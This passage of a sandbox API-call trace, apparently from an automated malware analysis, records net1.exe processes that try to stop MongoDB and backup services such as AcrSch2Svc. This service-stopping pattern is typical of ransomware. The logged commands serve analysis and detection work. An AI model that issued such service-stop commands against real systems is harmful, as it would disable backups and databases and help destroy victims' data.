16 [0071.899] _wcsicmp (_String1="sessions", _String2="cbVSCService11") returned 16 [0071.899] _wcsicmp (_String1="sess", _String2="cbVSCService11") returned 16 [0071.899] _wcsicmp (_String1="share", _String2="cbVSCService11") returned 16 [0071.899] _wcsicmp (_String1="start", _String2="cbVSCService11") returned 16 [0071.899] _wcsicmp (_String1="stats", _String2="cbVSCService11") returned 16 [0071.899] _wcsicmp (_String1="statistics", _String2="cbVSCService11") returned 16 [0071.899] _wcsicmp (_String1="stop", _String2="cbVSCService11") returned 16 [0071.899] _wcsicmp (_String1="time", _String2="cbVSCService11") returned 17 [0071.899] _wcsicmp (_String1="user", _String2="cbVSCService11") returned 18 [0071.899] _wcsicmp (_String1="users", _String2="cbVSCService11") returned 18 [0071.899] _wcsicmp (_String1="msg", _String2="cbVSCService11") returned 10 [0071.899] _wcsicmp (_String1="messenger", _String2="cbVSCService11") returned 10 [0071.899] _wcsicmp (_String1="receiver", _String2="cbVSCService11") returned 15 [0071.899] _wcsicmp (_String1="rcv", _String2="cbVSCService11") returned 15 [0071.899] _wcsicmp (_String1="netpopup", _String2="cbVSCService11") returned 11 [0071.899] _wcsicmp (_String1="redirector", _String2="cbVSCService11") returned 15 [0071.899] _wcsicmp (_String1="redir", _String2="cbVSCService11") returned 15 [0071.899] _wcsicmp (_String1="rdr", _String2="cbVSCService11") returned 15 [0071.899] _wcsicmp (_String1="workstation", _String2="cbVSCService11") returned 20 [0071.899] _wcsicmp (_String1="work", _String2="cbVSCService11") returned 20 [0071.899] _wcsicmp (_String1="wksta", _String2="cbVSCService11") returned 20 [0071.899] _wcsicmp (_String1="prdr", _String2="cbVSCService11") returned 13 [0071.899] _wcsicmp (_String1="devrdr", _String2="cbVSCService11") returned 1 [0071.899] _wcsicmp (_String1="lanmanworkstation", _String2="cbVSCService11") returned 9 [0071.899] _wcsicmp (_String1="server", _String2="cbVSCService11") returned 16 [0071.899] _wcsicmp (_String1="svr", _String2="cbVSCService11") returned 16 [0071.899] _wcsicmp (_String1="srv", _String2="cbVSCService11") returned 16 [0071.899] _wcsicmp (_String1="lanmanserver", _String2="cbVSCService11") returned 9 [0071.899] _wcsicmp (_String1="alerter", _String2="cbVSCService11") returned -2 [0071.899] _wcsicmp (_String1="netlogon", _String2="cbVSCService11") returned 11 [0071.900] _wcsupr (in: _String="cbVSCService11" | out: _String="CBVSCSERVICE11") returned="CBVSCSERVICE11" [0071.900] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5f5490 [0071.937] GetServiceKeyNameW (in: hSCManager=0x5f5490, lpDisplayName="CBVSCSERVICE11", lpServiceName=0xb1aaf0, lpcchBuffer=0x17fb18 | out: lpServiceName="", lpcchBuffer=0x17fb18) returned 0 [0071.939] _wcsicmp (_String1="msg", _String2="CBVSCSERVICE11") returned 10 [0071.939] _wcsicmp (_String1="messenger", _String2="CBVSCSERVICE11") returned 10 [0071.939] _wcsicmp (_String1="receiver", _String2="CBVSCSERVICE11") returned 15 [0071.939] _wcsicmp (_String1="rcv", _String2="CBVSCSERVICE11") returned 15 [0071.939] _wcsicmp (_String1="redirector", _String2="CBVSCSERVICE11") returned 15 [0071.939] _wcsicmp (_String1="redir", _String2="CBVSCSERVICE11") returned 15 [0071.939] _wcsicmp (_String1="rdr", _String2="CBVSCSERVICE11") returned 15 [0071.939] _wcsicmp (_String1="workstation", _String2="CBVSCSERVICE11") returned 20 [0071.939] _wcsicmp (_String1="work", _String2="CBVSCSERVICE11") returned 20 [0071.939] _wcsicmp (_String1="wksta", _String2="CBVSCSERVICE11") returned 20 [0071.939] _wcsicmp (_String1="prdr", _String2="CBVSCSERVICE11") returned 13 [0071.939] _wcsicmp (_String1="devrdr", _String2="CBVSCSERVICE11") returned 1 [0071.939] _wcsicmp (_String1="lanmanworkstation", _String2="CBVSCSERVICE11") returned 9 [0071.940] _wcsicmp (_String1="server", _String2="CBVSCSERVICE11") returned 16 [0071.940] _wcsicmp (_String1="svr", _String2="CBVSCSERVICE11") returned 16 [0071.940] _wcsicmp (_String1="srv", _String2="CBVSCSERVICE11") returned 16 [0071.940] _wcsicmp (_String1="lanmanserver", _String2="CBVSCSERVICE11") returned 9 [0071.940] _wcsicmp (_String1="alerter", _String2="CBVSCSERVICE11") returned -2 [0071.940] _wcsicmp (_String1="netlogon", _String2="CBVSCSERVICE11") returned 11 [0071.940] NetServiceControl (in: servername=0x0, service="CBVSCSERVICE11", opcode=0x0, arg=0x0, bufptr=0x17fb14 | out: bufptr=0x17fb14) returned 0x889 [0071.968] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0071.968] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74240000 [0071.969] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74240000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0071.970] GetFileType (hFile=0xb) returned 0x2 [0071.980] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x17fa34 | out: lpMode=0x17fa34) returned 1 [0071.981] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x17fa54, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x17fa54*=0x1e) returned 1 [0071.983] GetFileType (hFile=0xb) returned 0x2 [0071.985] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x17fa34 | out: lpMode=0x17fa34) returned 1 [0071.987] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x17fa54, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x17fa54*=0x2) returned 1 [0071.988] _ultow (in: _Dest=0x889, _Radix=1571460 | out: _Dest=0x889) returned="2185" [0071.988] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74240000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0071.988] GetFileType (hFile=0xb) returned 0x2 [0071.990] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x17fa40 | out: lpMode=0x17fa40) returned 1 [0071.992] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x17fa60, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x17fa60*=0x34) returned 1 [0071.993] GetFileType (hFile=0xb) returned 0x2 [0071.994] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x17fa40 | out: lpMode=0x17fa40) returned 1 [0071.995] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x17fa60, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x17fa60*=0x2) returned 1 [0071.996] NetApiBufferFree (Buffer=0x5f1c08) returned 0x0 [0071.996] NetApiBufferFree (Buffer=0x5f1c20) returned 0x0 [0071.996] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop cbVSCService11" [0071.996] exit (_Code=2) Process: id = "63" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x77a69000" os_pid = "0xb90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0x9fc" cmd_line = "C:\\Windows\\system32\\net1 stop MongoDB" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 186 os_tid = 0xbf8 [0071.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29fe5c | out: lpSystemTimeAsFileTime=0x29fe5c*(dwLowDateTime=0x998670f0, dwHighDateTime=0x1d57b18)) [0071.830] GetCurrentProcessId () returned 0xb90 [0071.830] GetCurrentThreadId () returned 0xbf8 [0071.830] GetTickCount () returned 0x114bda5 [0071.830] QueryPerformanceCounter (in: lpPerformanceCount=0x29fe54 | out: lpPerformanceCount=0x29fe54*=19205181225) returned 1 [0071.831] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.831] __set_app_type (_Type=0x1) [0071.831] __p__fmode () returned 0x74eb31f4 [0071.831] __p__commode () returned 0x74eb31fc [0071.831] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.831] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.831] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.831] GetConsoleOutputCP () returned 0x1b5 [0071.874] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.874] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.889] sprintf_s (in: _DstBuf=0x29fe14, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.889] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.904] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.904] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.904] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MongoDB" [0071.904] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29fbe0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.904] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x58) returned 0x2e3b98 [0071.904] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fde4 | out: Buffer=0x29fde4*=0x2e1bf0) returned 0x0 [0071.904] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fde4 | out: Buffer=0x29fde4*=0x2e1c08) returned 0x0 [0071.904] _fileno (_File=0x74eb2900) returned 0 [0071.904] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.904] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.904] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.904] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.904] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.904] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.904] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.904] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.905] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.905] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.905] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.905] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.905] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.905] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.905] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.905] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.905] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.905] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.905] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.905] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.905] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.905] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.905] _wcsicmp (_String1="accounts", _String2="MongoDB") returned -12 [0071.905] _wcsicmp (_String1="computer", _String2="MongoDB") returned -10 [0071.905] _wcsicmp (_String1="config", _String2="MongoDB") returned -10 [0071.905] _wcsicmp (_String1="continue", _String2="MongoDB") returned -10 [0071.905] _wcsicmp (_String1="cont", _String2="MongoDB") returned -10 [0071.905] _wcsicmp (_String1="file", _String2="MongoDB") returned -7 [0071.905] _wcsicmp (_String1="files", _String2="MongoDB") returned -7 [0071.905] _wcsicmp (_String1="group", _String2="MongoDB") returned -6 [0071.905] _wcsicmp (_String1="groups", _String2="MongoDB") returned -6 [0071.905] _wcsicmp (_String1="help", _String2="MongoDB") returned -5 [0071.905] _wcsicmp (_String1="helpmsg", _String2="MongoDB") returned -5 [0071.905] _wcsicmp (_String1="localgroup", _String2="MongoDB") returned -1 [0071.905] _wcsicmp (_String1="pause", _String2="MongoDB") returned 3 [0071.905] _wcsicmp (_String1="session", _String2="MongoDB") returned 6 [0071.905] _wcsicmp (_String1="sessions", _String2="MongoDB") returned 6 [0071.905] _wcsicmp (_String1="sess", _String2="MongoDB") returned 6 [0071.905] _wcsicmp (_String1="share", _String2="MongoDB") returned 6 [0071.905] _wcsicmp (_String1="start", _String2="MongoDB") returned 6 [0071.905] _wcsicmp (_String1="stats", _String2="MongoDB") returned 6 [0071.905] _wcsicmp (_String1="statistics", _String2="MongoDB") returned 6 [0071.905] _wcsicmp (_String1="stop", _String2="MongoDB") returned 6 [0071.905] _wcsicmp (_String1="time", _String2="MongoDB") returned 7 [0071.905] _wcsicmp (_String1="user", _String2="MongoDB") returned 8 [0071.906] _wcsicmp (_String1="users", _String2="MongoDB") returned 8 [0071.906] _wcsicmp (_String1="msg", _String2="MongoDB") returned 4 [0071.906] _wcsicmp (_String1="messenger", _String2="MongoDB") returned -10 [0071.906] _wcsicmp (_String1="receiver", _String2="MongoDB") returned 5 [0071.906] _wcsicmp (_String1="rcv", _String2="MongoDB") returned 5 [0071.906] _wcsicmp (_String1="netpopup", _String2="MongoDB") returned 1 [0071.906] _wcsicmp (_String1="redirector", _String2="MongoDB") returned 5 [0071.906] _wcsicmp (_String1="redir", _String2="MongoDB") returned 5 [0071.906] _wcsicmp (_String1="rdr", _String2="MongoDB") returned 5 [0071.906] _wcsicmp (_String1="workstation", _String2="MongoDB") returned 10 [0071.906] _wcsicmp (_String1="work", _String2="MongoDB") returned 10 [0071.906] _wcsicmp (_String1="wksta", _String2="MongoDB") returned 10 [0071.906] _wcsicmp (_String1="prdr", _String2="MongoDB") returned 3 [0071.906] _wcsicmp (_String1="devrdr", _String2="MongoDB") returned -9 [0071.906] _wcsicmp (_String1="lanmanworkstation", _String2="MongoDB") returned -1 [0071.906] _wcsicmp (_String1="server", _String2="MongoDB") returned 6 [0071.906] _wcsicmp (_String1="svr", _String2="MongoDB") returned 6 [0071.906] _wcsicmp (_String1="srv", _String2="MongoDB") returned 6 [0071.906] _wcsicmp (_String1="lanmanserver", _String2="MongoDB") returned -1 [0071.906] _wcsicmp (_String1="alerter", _String2="MongoDB") returned -12 [0071.906] _wcsicmp (_String1="netlogon", _String2="MongoDB") returned 1 [0071.906] _wcsupr (in: _String="MongoDB" | out: _String="MONGODB") returned="MONGODB" [0071.906] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2e5468 [0071.938] GetServiceKeyNameW (in: hSCManager=0x2e5468, lpDisplayName="MONGODB", lpServiceName=0xb1aaf0, lpcchBuffer=0x29fd80 | out: lpServiceName="", lpcchBuffer=0x29fd80) returned 0 [0071.940] _wcsicmp (_String1="msg", _String2="MONGODB") returned 4 [0071.940] _wcsicmp (_String1="messenger", _String2="MONGODB") returned -10 [0071.940] _wcsicmp (_String1="receiver", _String2="MONGODB") returned 5 [0071.940] _wcsicmp (_String1="rcv", _String2="MONGODB") returned 5 [0071.940] _wcsicmp (_String1="redirector", _String2="MONGODB") returned 5 [0071.940] _wcsicmp (_String1="redir", _String2="MONGODB") returned 5 [0071.940] _wcsicmp (_String1="rdr", _String2="MONGODB") returned 5 [0071.940] _wcsicmp (_String1="workstation", _String2="MONGODB") returned 10 [0071.941] _wcsicmp (_String1="work", _String2="MONGODB") returned 10 [0071.941] _wcsicmp (_String1="wksta", _String2="MONGODB") returned 10 [0071.941] _wcsicmp (_String1="prdr", _String2="MONGODB") returned 3 [0071.941] _wcsicmp (_String1="devrdr", _String2="MONGODB") returned -9 [0071.941] _wcsicmp (_String1="lanmanworkstation", _String2="MONGODB") returned -1 [0071.941] _wcsicmp (_String1="server", _String2="MONGODB") returned 6 [0071.941] _wcsicmp (_String1="svr", _String2="MONGODB") returned 6 [0071.941] _wcsicmp (_String1="srv", _String2="MONGODB") returned 6 [0071.941] _wcsicmp (_String1="lanmanserver", _String2="MONGODB") returned -1 [0071.941] _wcsicmp (_String1="alerter", _String2="MONGODB") returned -12 [0071.941] _wcsicmp (_String1="netlogon", _String2="MONGODB") returned 1 [0071.941] NetServiceControl (in: servername=0x0, service="MONGODB", opcode=0x0, arg=0x0, bufptr=0x29fd7c | out: bufptr=0x29fd7c) returned 0x889 [0071.971] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0071.971] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74240000 [0071.972] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74240000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0071.973] GetFileType (hFile=0xb) returned 0x2 [0071.980] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x29fc9c | out: lpMode=0x29fc9c) returned 1 [0071.982] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x29fcbc, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x29fcbc*=0x1e) returned 1 [0071.985] GetFileType (hFile=0xb) returned 0x2 [0071.986] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x29fc9c | out: lpMode=0x29fc9c) returned 1 [0071.987] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x29fcbc, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x29fcbc*=0x2) returned 1 [0071.989] _ultow (in: _Dest=0x889, _Radix=2751724 | out: _Dest=0x889) returned="2185" [0071.989] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74240000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0071.989] GetFileType (hFile=0xb) returned 0x2 [0071.991] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x29fca8 | out: lpMode=0x29fca8) returned 1 [0071.992] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x29fcc8, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x29fcc8*=0x34) returned 1 [0071.993] GetFileType (hFile=0xb) returned 0x2 [0071.994] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x29fca8 | out: lpMode=0x29fca8) returned 1 [0071.995] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x29fcc8, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x29fcc8*=0x2) returned 1 [0072.003] NetApiBufferFree (Buffer=0x2e1bf0) returned 0x0 [0072.003] NetApiBufferFree (Buffer=0x2e1c08) returned 0x0 [0072.003] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MongoDB" [0072.003] exit (_Code=2) Process: id = "64" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x7791c000" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0x7e4" cmd_line = "C:\\Windows\\system32\\net1 stop AcrSch2Svc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 187 os_tid = 0x128 [0071.836] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfe60 | out: lpSystemTimeAsFileTime=0xdfe60*(dwLowDateTime=0x9988d250, dwHighDateTime=0x1d57b18)) [0071.836] GetCurrentProcessId () returned 0xba0 [0071.836] GetCurrentThreadId () returned 0x128 [0071.836] GetTickCount () returned 0x114bdb4 [0071.836] QueryPerformanceCounter (in: lpPerformanceCount=0xdfe58 | out: lpPerformanceCount=0xdfe58*=19205755360) returned 1 [0071.836] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.836] __set_app_type (_Type=0x1) [0071.836] __p__fmode () returned 0x74eb31f4 [0071.836] __p__commode () returned 0x74eb31fc [0071.837] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.837] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.837] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.837] GetConsoleOutputCP () returned 0x1b5 [0071.876] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.876] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.891] sprintf_s (in: _DstBuf=0xdfe18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.891] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.910] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.910] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.910] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcrSch2Svc" [0071.910] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdfbe4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.910] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x5e) returned 0x393ba8 [0071.910] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfde8 | out: Buffer=0xdfde8*=0x391c00) returned 0x0 [0071.910] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfde8 | out: Buffer=0xdfde8*=0x391c18) returned 0x0 [0071.911] _fileno (_File=0x74eb2900) returned 0 [0071.911] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.911] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.911] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.911] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.911] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.911] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.911] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.911] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.911] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.911] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.911] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.911] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.911] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.911] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.911] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.911] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.911] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.911] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.911] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.911] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.911] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.911] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.911] _wcsicmp (_String1="accounts", _String2="AcrSch2Svc") returned -15 [0071.911] _wcsicmp (_String1="computer", _String2="AcrSch2Svc") returned 2 [0071.911] _wcsicmp (_String1="config", _String2="AcrSch2Svc") returned 2 [0071.911] _wcsicmp (_String1="continue", _String2="AcrSch2Svc") returned 2 [0071.911] _wcsicmp (_String1="cont", _String2="AcrSch2Svc") returned 2 [0071.912] _wcsicmp (_String1="file", _String2="AcrSch2Svc") returned 5 [0071.912] _wcsicmp (_String1="files", _String2="AcrSch2Svc") returned 5 [0071.912] _wcsicmp (_String1="group", _String2="AcrSch2Svc") returned 6 [0071.912] _wcsicmp (_String1="groups", _String2="AcrSch2Svc") returned 6 [0071.912] _wcsicmp (_String1="help", _String2="AcrSch2Svc") returned 7 [0071.912] _wcsicmp (_String1="helpmsg", _String2="AcrSch2Svc") returned 7 [0071.912] _wcsicmp (_String1="localgroup", _String2="AcrSch2Svc") returned 11 [0071.912] _wcsicmp (_String1="pause", _String2="AcrSch2Svc") returned 15 [0071.912] _wcsicmp (_String1="session", _String2="AcrSch2Svc") returned 18 [0071.912] _wcsicmp (_String1="sessions", _String2="AcrSch2Svc") returned 18 [0071.912] _wcsicmp (_String1="sess", _String2="AcrSch2Svc") returned 18 [0071.912] _wcsicmp (_String1="share", _String2="AcrSch2Svc") returned 18 [0071.912] _wcsicmp (_String1="start", _String2="AcrSch2Svc") returned 18 [0071.912] _wcsicmp (_String1="stats", _String2="AcrSch2Svc") returned 18 [0071.912] _wcsicmp (_String1="statistics", _String2="AcrSch2Svc") returned 18 [0071.912] _wcsicmp (_String1="stop", _String2="AcrSch2Svc") returned 18 [0071.912] _wcsicmp (_String1="time", _String2="AcrSch2Svc") returned 19 [0071.912] _wcsicmp (_String1="user", _String2="AcrSch2Svc") returned 20 [0071.912] _wcsicmp (_String1="users", _String2="AcrSch2Svc") returned 20 [0071.912] _wcsicmp (_String1="msg", _String2="AcrSch2Svc") returned 12 [0071.912] _wcsicmp (_String1="messenger", _String2="AcrSch2Svc") returned 12 [0071.912] _wcsicmp (_String1="receiver", _String2="AcrSch2Svc") returned 17 [0071.912] _wcsicmp (_String1="rcv", _String2="AcrSch2Svc") returned 17 [0071.912] _wcsicmp (_String1="netpopup", _String2="AcrSch2Svc") returned 13 [0071.912] _wcsicmp (_String1="redirector", _String2="AcrSch2Svc") returned 17 [0071.912] _wcsicmp (_String1="redir", _String2="AcrSch2Svc") returned 17 [0071.912] _wcsicmp (_String1="rdr", _String2="AcrSch2Svc") returned 17 [0071.912] _wcsicmp (_String1="workstation", _String2="AcrSch2Svc") returned 22 [0071.912] _wcsicmp (_String1="work", _String2="AcrSch2Svc") returned 22 [0071.912] _wcsicmp (_String1="wksta", _String2="AcrSch2Svc") returned 22 [0071.912] _wcsicmp (_String1="prdr", _String2="AcrSch2Svc") returned 15 [0071.913] _wcsicmp (_String1="devrdr", _String2="AcrSch2Svc") returned 3 [0071.913] _wcsicmp (_String1="lanmanworkstation", _String2="AcrSch2Svc") returned 11 [0071.913] _wcsicmp (_String1="server", _String2="AcrSch2Svc") returned 18 [0071.913] _wcsicmp (_String1="svr", _String2="AcrSch2Svc") returned 18 [0071.913] _wcsicmp (_String1="srv", _String2="AcrSch2Svc") returned 18 [0071.913] _wcsicmp (_String1="lanmanserver", _String2="AcrSch2Svc") returned 11 [0071.913] _wcsicmp (_String1="alerter", _String2="AcrSch2Svc") returned 9 [0071.913] _wcsicmp (_String1="netlogon", _String2="AcrSch2Svc") returned 13 [0071.913] _wcsupr (in: _String="AcrSch2Svc" | out: _String="ACRSCH2SVC") returned="ACRSCH2SVC" [0071.913] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x395480 [0071.938] GetServiceKeyNameW (in: hSCManager=0x395480, lpDisplayName="ACRSCH2SVC", lpServiceName=0xb1aaf0, lpcchBuffer=0xdfd84 | out: lpServiceName="", lpcchBuffer=0xdfd84) returned 0 [0071.941] _wcsicmp (_String1="msg", _String2="ACRSCH2SVC") returned 12 [0071.941] _wcsicmp (_String1="messenger", _String2="ACRSCH2SVC") returned 12 [0071.941] _wcsicmp 